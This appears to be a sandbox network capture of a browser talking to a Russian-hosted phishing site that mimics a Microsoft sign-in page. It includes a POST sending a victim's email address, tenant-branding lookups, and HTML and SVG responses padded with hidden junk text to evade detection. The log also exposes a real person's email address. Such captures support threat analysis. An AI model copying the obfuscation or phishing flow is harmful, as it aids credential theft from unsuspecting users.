                                                                                                                                                                                    2024-01-26 13:41:52 UTC1369INData Raw: 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 63 68 61 71 31 41 4d 67 4e 79 46 62 5a 3c 2f 73 70 61 6e 3e 72 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 42 50 46 31 4d 39 59 4a 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 61 6b 63 6e 38 42 63 34 33 65 3c 2f 73 70 61 6e 3e 6c 79 20 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 20 2d 39 39 39 39 70 78 3b 22 3e 54 6f 30 54 37 6b 52 44 78 4e 4c 7a 47 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65
                                                                                                                                                                                    Data Ascii: lute;left: -9999px;">chaq1AMgNyFbZ</span>r<span style="position: absolute;left: -9999px;">BPF1M9YJ</span>i<span style="position: absolute;left: -9999px;">akcn8Bc43e</span>ly l<span style="position: absolute;left: -9999px;">To0T7kRDxNLzG</span>o<span style


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    41192.168.2.1649777104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:53 UTC919OUTPOST /VyRsmGftiIlOxrabXBIOtQtS/3ETwEspTY8j HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                    X-Requested-With: XMLHttpRequest
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Origin: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:53 UTC55OUTData Raw: 66 50 43 6a 41 78 55 51 62 5a 62 3d 45 6f 50 76 50 6e 59 41 61 26 78 79 55 54 74 4c 7a 70 6c 42 73 3d 64 61 76 69 64 2e 79 76 6f 6e 40 61 66 74 72 61 6c 2e 63 6f 6d
                                                                                                                                                                                    Data Ascii: fPCjAxUQbZb=EoPvPnYAa&xyUTtLzplBs=david.yvon@aftral.com
                                                                                                                                                                                    2024-01-26 13:41:54 UTC735INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PQbN9MrdqRd%2BjjMZvkNtTv1%2F4KEDQUrqz%2BymqDxvpNizPgUQCgTaBp1oVdKPU96p85UJfPTtGSIvBXDoX2vIJYmM8t%2FiphLdMIAqnLjB7VzuKVBj39JvHcsXF4ujH3db%2Fmzza0ZQ5E17MJNjYfSFi9tcVw8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d11fd8144e4-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:54 UTC419INData Raw: 31 39 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 62 61 6e 6e 65 72 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 69 6d 61 67 65 73 2e 6e 65 74 5c 2f 63 31 63 36 62 36 63 38 2d 6b 69 38 34 67 7a 66 6e 76 39 32 78 66 35 74 71 6b 6a 6c 69 61 61 78 66 6c 6e 2d 66 73 2d 63 69 79 72 6a 6e 61 69 35 2d 77 74 6f 5c 2f 6c 6f 67 69 6e 74 65 6e 61 6e 74 62 72 61 6e 64 69 6e 67 5c 2f 30 5c 2f 62 61 6e 6e 65 72 6c 6f 67 6f 3f 74 73 3d 36 33 36 39 37 33 30 36 36 35 30 37 37 33 37 31 38 31 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 69 6d 61 67 65 73 2e 6e 65 74 5c 2f 63 31 63 36 62 36 63 38 2d 6b 69 38 34 67 7a 66 6e 76 39 32 78 66 35 74
                                                                                                                                                                                    Data Ascii: 19c{"status":"success","banner":"https:\/\/aadcdn.msauthimages.net\/c1c6b6c8-ki84gzfnv92xf5tqkjliaaxfln-fs-ciyrjnai5-wto\/logintenantbranding\/0\/bannerlogo?ts=636973066507737181","background":"https:\/\/aadcdn.msauthimages.net\/c1c6b6c8-ki84gzfnv92xf5t
                                                                                                                                                                                    2024-01-26 13:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    42192.168.2.1649779104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:53 UTC786OUTGET /VyRsmGftiIlOxrabXBIOtQtS/63Ag6b7lSc/5vOgy6RaRMInSrZ5 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:54 UTC722INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gdLhcZRGBdgwMagD1IVQdPNx9EX23XZCREVwnmWGA1Oc5gQHIzTBfOV%2BbWiixV1M2d4TWkg31wIggw%2Fdkgwa8I9rcFEWFtl2LFNEYeMIYb95ErgRnShDE5iJEIUAFlG5Wk9mo8MNA5%2B%2FGwSXdkYnUy1NWUU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d12ef384535-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:54 UTC647INData Raw: 31 37 34 66 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 35 31 22 20 52 71 5a 4c 78 75 54 4c 65 48 41 3d 22 54 4d 75 4a 62 53 52 77 4a 4f 78 22 20 20 68 65 69 67 68 74 3d 22 32 36 22 20 76 69 65 77 42 6f 78 3d 22 2d 31 2e 34 34 20 2d 33 20 31 35 31 20 32 34 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 66 4e 65 76 6e 42 6b 53 41 6b 6d 63 53 3c 2f 74 65 78 74 3e 3c 72 65 63 74 20 78 3d 22 33 30
                                                                                                                                                                                    Data Ascii: 174f<svg xmlns="http://www.w3.org/2000/svg" width="151" RqZLxuTLeHA="TMuJbSRwJOx" height="26" viewBox="-1.44 -3 151 24"><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">fNevnBkSAkmcS</text><rect x="30
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 3d 22 59 62 64 75 52 57 6d 55 61 56 59 5a 45 22 20 20 66 69 6c 6c 3d 22 23 33 32 44 34 33 32 22 20 2f 3e 3c 70 61 74 68 20 6d 4d 4d 65 70 4f 48 4e 51 64 74 4b 48 58 64 3d 22 70 52 44 7a 6c 64 57 4f 73 4b 4b 22 20 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 2c 30 2c 31 2c 2e 34 31 39 2d 2e 39 36 37 2c 31 2e 34 31 33 2c 31 2e 34 31 33 2c 30 2c 30 2c 31 2c 31 2d 2e 33 39 2c 31
                                                                                                                                                                                    Data Ascii: ="YbduRWmUaVYZE" fill="#32D432" /><path mMMepOHNQdtKHXd="pRDzldWOsKK" d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 2c 30 2c 31 2c 36 36 2e 34 30 36 2c 31 33 2e 36 6d 32 2e 34 32 35 2d 2e 30 37 37 61 33 2e 35 33 35 2c 33 2e 35 33 35 2c 30 2c 30 2c 30 2c 2e 37 2c 32 2e 33 36 38 2c 32 2e 35 30 35 2c 32 2e 35 30 35 2c 30 2c 30 2c 30 2c 32 2e 30 31 31 2e 38 31 38 2c 32 2e 33 34 35 2c 32 2e 33 34 35 2c 30 2c 30 2c 30 2c 31 2e 39 33 34 2d 2e 38 31 38 2c 33 2e 37 38 33 2c 33 2e 37 38 33 2c 30 2c 30 2c 30 2c 2e 36 36 34 2d 32 2e 34 32 35 2c 33 2e 36 35 31 2c 33 2e 36 35 31 2c 30 2c 30 2c 30 2d 2e 36 38 38 2d 32 2e 34 31 31 2c 32 2e 33 38 39 2c 32 2e 33 38 39 2c 30 2c 30 2c 30 2d 31 2e 39 32 39 2d 2e 38 31 33 2c 32 2e 34 34 2c 32 2e 34 34 2c 30 2c 30 2c 30 2d 31 2e 39 38 38 2e 38 35 32 2c 33 2e 37 30 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 31
                                                                                                                                                                                    Data Ascii: ,0,1,66.406,13.6m2.425-.077a3.535,3.535,0,0,0,.7,2.368,2.505,2.505,0,0,0,2.011.818,2.345,2.345,0,0,0,1.934-.818,3.783,3.783,0,0,0,.664-2.425,3.651,3.651,0,0,0-.688-2.411,2.389,2.389,0,0,0-1.929-.813,2.44,2.44,0,0,0-1.988.852,3.707,3.707,0,0,0-.707,2.43m11
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 37 2c 33 2e 37 30 37 2c 30 2c 30 2c 30 2d 2e 37 30 37 2c 32 2e 34 33 6d 31 35 2e 34 36 34 2d 33 2e 31 30 39 48 39 39 2e 37 56 31 38 2e 34 48 39 37 2e 33 34 31 56 31 30 2e 34 31 32 48 39 35 2e 36 38 36 56 38 2e 35 30 37 68 31 2e 36 35 35 56 37 2e 31 33 61 33 2e 34 32 33 2c 33 2e 34 32 33 2c 30 2c 30 2c 31 2c 31 2e 30 31 35 2d 32 2e 35 35 35 2c 33 2e 35 36 31 2c 33 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 2d 31 2c 35 2e 38 30 37 2c 35 2e 38 30 37 2c 30 2c 30 2c 31 2c 2e 37 35 31 2e 30 34 33 2c 32 2e 39 39 33 2c 32 2e 39 39 33 2c 30 2c 30 2c 31 2c 2e 35 37 37 2e 31 33 56 35 2e 37 36 34 61 32 2e 34 32 32 2c 32 2e 34 32 32 2c 30 2c 30 2c 30 2d 2e 34 2d 2e 31 36 34 2c 32 2e 31 30 37 2c 32 2e 31 30 37 2c 30 2c 30 2c 30 2d 2e 36 36 34 2d 2e 31 2c 31 2e 34 30 37
                                                                                                                                                                                    Data Ascii: 7,3.707,0,0,0-.707,2.43m15.464-3.109H99.7V18.4H97.341V10.412H95.686V8.507h1.655V7.13a3.423,3.423,0,0,1,1.015-2.555,3.561,3.561,0,0,1,2.6-1,5.807,5.807,0,0,1,.751.043,2.993,2.993,0,0,1,.577.13V5.764a2.422,2.422,0,0,0-.4-.164,2.107,2.107,0,0,0-.664-.1,1.407
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1221INData Raw: 20 79 3d 22 30 2e 30 36 38 22 20 77 69 64 74 68 3d 22 30 2e 33 31 22 20 68 65 69 67 68 74 3d 22 32 33 22 20 20 41 6f 62 6c 5a 48 77 64 43 4d 45 46 3d 22 57 45 71 62 73 58 5a 53 59 4d 75 53 22 20 20 66 69 6c 6c 3d 22 23 37 36 46 35 37 36 22 20 2f 3e 3c 72 65 63 74 20 78 3d 22 31 32 2e 30 36 38 22 20 20 77 62 45 4c 49 71 5a 48 3d 22 6b 72 77 59 61 58 4c 73 57 42 67 42 50 58 73 22 20 20 79 3d 22 31 32 2e 30 36 38 22 20 77 69 64 74 68 3d 22 31 30 2e 36 33 32 22 20 68 65 69 67 68 74 3d 22 31 30 2e 39 33 31 22 20 66 69 6c 6c 3d 22 23 46 46 41 33 31 38 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65
                                                                                                                                                                                    Data Ascii: y="0.068" width="0.31" height="23" AoblZHwdCMEF="WEqbsXZSYMuS" fill="#76F576" /><rect x="12.068" wbELIqZH="krwYaXLsWBgBPXs" y="12.068" width="10.632" height="10.931" fill="#FFA318"/><text style="display: inline;color: #1A7D75;max-width: 0.01px;max-he
                                                                                                                                                                                    2024-01-26 13:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    43192.168.2.1649780104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:53 UTC782OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6lp36DM7bxL/6YuqRWrsKjk HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:54 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FBN8Vh5CMZvCqo6hcJmWKhfvoiD0xPGVgu67%2BlMXVdhR3eilL01GNjqHoX3IuZjudNgM43mWUlWwPZh0Jbpir%2FjhMpUsnEcgiyEOQK4JZO2CxYwOhIDeTORgZosO%2Fck08LX0fo0ZVZgP8mNUNyHHBh3DJOA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d131c0f6736-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:54 UTC649INData Raw: 39 38 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 6f 79 6d 4c 66 69 59 39 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63
                                                                                                                                                                                    Data Ascii: 98e<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">oymLfiY9</text><span style="display: inline; c
                                                                                                                                                                                    2024-01-26 13:41:54 UTC1369INData Raw: 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 31 6d 36 4b 66 51 72 45 61 33 69 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30 36 2c 30 2c 30 2c 31 2d 32 2e 32 31 39 2d 31 2e 37 31 39 41 31
                                                                                                                                                                                    Data Ascii: x-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">1m6KfQrEa3i</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A1
                                                                                                                                                                                    2024-01-26 13:41:54 UTC435INData Raw: 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a
                                                                                                                                                                                    Data Ascii: 91,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-siz
                                                                                                                                                                                    2024-01-26 13:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    44192.168.2.1649778104.21.79.94436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:53 UTC783OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6NPonlRNZ/2nXHEFxrXx6mk4 HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/?0HbagOxTQkTz?080cc3b5ddZGF2aWQueXZvbkBhZnRyYWwuY29t
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:41:54 UTC716INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:54 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RMW5Lpfq2Ij17oY9dmQzddy1J9P4HjqEslrsuT5o0nJIIiaWZOJVBlRiLUA8u7IEjQptaPl3gpyGsdK8aa9FzD5YgvIPSnnAMKNYnkvFOC9HuXRnngsq52VGbcXiQTOvag%2FbPSwFlREMQQ98TjKA8sYZqGk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92d131ae6249c-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
